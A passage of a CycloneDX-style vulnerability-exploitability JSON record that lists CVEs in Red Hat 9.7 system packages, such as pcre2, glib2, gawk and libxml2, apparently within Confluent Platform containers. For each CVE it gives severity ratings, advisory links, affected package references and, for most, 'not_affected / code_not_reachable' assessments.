"urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable." } }, { "id": "CVE-2022-41409", "ratings": [ { "source": { "name": "amazon" }, "severity": "low" }, { "source": { "name": "cbl-mariner" }, "severity": "high" }, { "source": { "name": "nvd" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 5.3, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 190 ], "description": "Integer overflow vulnerability in pcre2test before 10.41 allows attackers to cause a denial of service or other unspecified impacts via negative input.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2022-41409" }, { "url": "https://access.redhat.com/security/cve/CVE-2022-41409" }, { "url": "https://github.com/PCRE2Project/pcre2/commit/94e1c001761373b7d9450768aa15d04c25547a35" }, { "url": "https://github.com/PCRE2Project/pcre2/issues/141" }, { "url": "https://github.com/advisories/GHSA-4qfx-v7wh-3q4j" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41409" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2022-41409" } ], "published": "2023-07-18T14:15:12+00:00", "updated": "2024-11-21T07:23:10+00:00", "affects": [ { "ref": "pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "10.40-6.el9", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "10.40-6.el9", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable." } }, { "id": "CVE-2023-30571", "ratings": [ { "source": { "name": "nvd" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H" }, { "source": { "name": "redhat" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H" } ], "cwes": [ 362 ], "description": "Libarchive through 3.6.2 can cause directories to have world-writable permissions. The umask() call inside archive_write_disk_posix.c changes the umask of the whole process for a very short period of time; a race condition with another thread can lead to a permanent umask 0 setting. Such a race condition could lead to implicit directory creation with permissions 0777 (without the sticky bit), which means that any low-privileged local user can delete and rename files inside those directories.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2023-30571" }, { "url": "https://access.redhat.com/security/cve/CVE-2023-30571" }, { "url": "https://access.redhat.com/solutions/7033331" }, { "url": "https://github.com/libarchive/libarchive/issues/1876" }, { "url": "https://groups.google.com/g/libarchive-announce" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-30571" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2023-30571" } ], "published": "2023-05-29T20:15:09+00:00", "updated": "2025-01-14T17:15:11+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.5.3-7.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" } ] }, { "id": "CVE-2023-32636", "ratings": [ { "source": { "name": "alma" }, "severity": "low" }, { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "cbl-mariner" }, "severity": "high" }, { "source": { "name": "nvd" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "oracle-oval" }, "severity": "low" }, { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 6.2, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 400, 502 ], "description": "A flaw was found in glib, where the gvariant deserialization code is vulnerable to a denial of service introduced by additional input validation added to resolve CVE-2023-29499. The offset table validation may be very slow. This bug does not affect any released version of glib but does affect glib distributors who followed the guidance of glib developers to backport the initial fix for CVE-2023-29499.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2023-32636" }, { "url": "https://access.redhat.com/errata/RHSA-2024:2528" }, { "url": "https://access.redhat.com/security/cve/CVE-2023-32636" }, { "url": "https://bugzilla.redhat.com/2211827" }, { "url": "https://bugzilla.redhat.com/2211828" }, { "url": "https://bugzilla.redhat.com/2211829" }, { "url": "https://bugzilla.redhat.com/2211833" }, { "url": "https://discourse.gnome.org/t/multiple-fixes-for-gvariant-normalisation-issues-in-glib/12835" }, { "url": "https://errata.almalinux.org/9/ALSA-2024-2528.html" }, { "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/2841" }, { "url": "https://https://discourse.gnome.org/t/multiple-fixes-for-gvariant-normalisation-issues-in-glib/12835" }, { "url": "https://linux.oracle.com/cve/CVE-2023-32636.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2024-2528.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32636" }, { "url": "https://security.netapp.com/advisory/ntap-20231110-0002/" }, { "url": "https://ubuntu.com/security/notices/USN-6165-1" }, { "url": "https://ubuntu.com/security/notices/USN-6165-2" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2023-32636" } ], "published": "2023-09-14T20:15:09+00:00", "updated": "2024-11-21T08:03:44+00:00", "affects": [ { "ref": "pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.68.4-18.el9_7.1", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable." } }, { "id": "CVE-2023-39804", "ratings": [ { "source": { "name": "amazon" }, "severity": "low" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 3.3, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "description": "In GNU tar before 1.35, mishandled extension attributes in a PAX archive can lead to an application crash in xheader.c.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2023-39804" }, { "url": "https://access.redhat.com/security/cve/CVE-2023-39804" }, { "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1058079" }, { "url": "https://git.savannah.gnu.org/cgit/tar.git/commit/?id=a339f05cd269013fa133d2f148d73f6f7d4247e4" }, { "url": "https://git.savannah.gnu.org/cgit/tar.git/tree/src/xheader.c?h=release_1_34#n1723" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/03/msg00008.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39804" }, { "url": "https://ubuntu.com/security/notices/USN-6543-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2023-39804" } ], "published": "2024-03-27T04:15:08+00:00", "updated": "2025-11-04T19:15:55+00:00", "affects": [ { "ref": "pkg:rpm/redhat/tar@1.34-9.el9_7?arch=x86_64&distro=redhat-9.7&epoch=2", "versions": [ { "version": "2:1.34-9.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/tar@1.34-9.el9_7?arch=x86_64&distro=redhat-9.7&epoch=2" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable." } }, { "id": "CVE-2023-4156", "ratings": [ { "source": { "name": "amazon" }, "severity": "low" }, { "source": { "name": "cbl-mariner" }, "severity": "high" }, { "source": { "name": "nvd" }, "score": 7.1, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H" }, { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 6.1, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 125 ], "description": "A heap out-of-bounds read flaw was found in builtin.c in the gawk package. This issue may lead to a crash and could be used to read sensitive information.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2023-4156" }, { "url": "https://access.redhat.com/security/cve/CVE-2023-4156" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2215930" }, { "url": "https://git.savannah.gnu.org/gitweb/?p=gawk.git;a=commitdiff;h=e709eb829448ce040087a3fc5481db6bfcaae212" }, { "url": "https://mail.gnu.org/archive/html/bug-gawk/2022-08/msg00000.html" }, { "url": "https://mail.gnu.org/archive/html/bug-gawk/2022-08/msg00023.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4156" }, { "url": "https://ubuntu.com/security/notices/USN-6373-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2023-4156" } ], "published": "2023-09-25T18:15:11+00:00", "updated": "2024-11-21T08:34:30+00:00", "affects": [ { "ref": "pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "5.1.0-6.el9", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable." } }, { "id": "CVE-2023-45322", "ratings": [ { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "nvd" }, "score": 6.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 5.9, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "cwes": [ 416 ], "description": "libxml2 through 2.11.5 has a use-after-free that can only occur after a certain memory allocation fails. This occurs in xmlUnlinkNode in tree.c. NOTE: the vendor's position is \"I don't think these issues are critical enough to warrant a CVE ID ... because an attacker typically can't control when memory allocations fail.\"", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2023-45322" }, { "url": "http://www.openwall.com/lists/oss-security/2023/10/06/5" }, { "url": "https://access.redhat.com/security/cve/CVE-2023-45322" }, { "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/344" }, { "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/583" }, { "url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00028.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45322" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2023-45322" } ], "published": "2023-10-06T22:15:11+00:00", "updated": "2025-11-03T21:16:01+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.9.13-14.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": 